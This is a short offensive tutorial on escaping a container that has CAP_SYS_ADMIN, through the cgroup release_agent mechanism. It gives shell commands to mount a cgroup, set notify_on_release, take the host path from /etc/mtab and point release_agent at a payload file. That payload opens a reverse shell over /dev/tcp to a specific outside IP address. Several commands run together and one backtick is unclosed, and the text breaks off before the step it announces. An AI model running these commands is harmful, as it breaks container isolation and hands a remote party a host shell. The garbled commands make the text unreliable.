Container breakout: CAP_SYS_ADMIN via Creating a cgroup and using unshare utility
Prerequisites:
- We need to be root inside the container.
- CAP_SYS_ADMIN capability should be there.
- The container filesystem should not be mounted as read-only
- We should be able to find any valid path within host filesystem to access container files.(alternative below)
- We should have mount permissions.
First Way(Finding host filesystem path via /etc/mtab file)-
Steps-
a) Listing capabilities within container-
capa=`cat /proc/1/status | grep -i 'CapEff' | awk '{print $2}'`; capsh --decode=$capab) Creating a cgroup, child group x and configuring notify_on_release
mkdir /tmp/cgrpmount -t cgroup -o memory cgroup /tmp/cgrpmkdir /tmp/cgrp/xecho 1 > /tmp/cgrp/x/notify_on_releasehost_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtabecho "$host_path/cmd" > /tmp/cgrp/release_agent
Writing payload to /cmd file and assigning current process to the the newly created cgroup by writing its PID to the cgroup.procs
echo '#!/bin/sh' > /cmd
echo "sh -i >& /dev/tcp/9.42.116.123/443 0>&1" >> /cmd
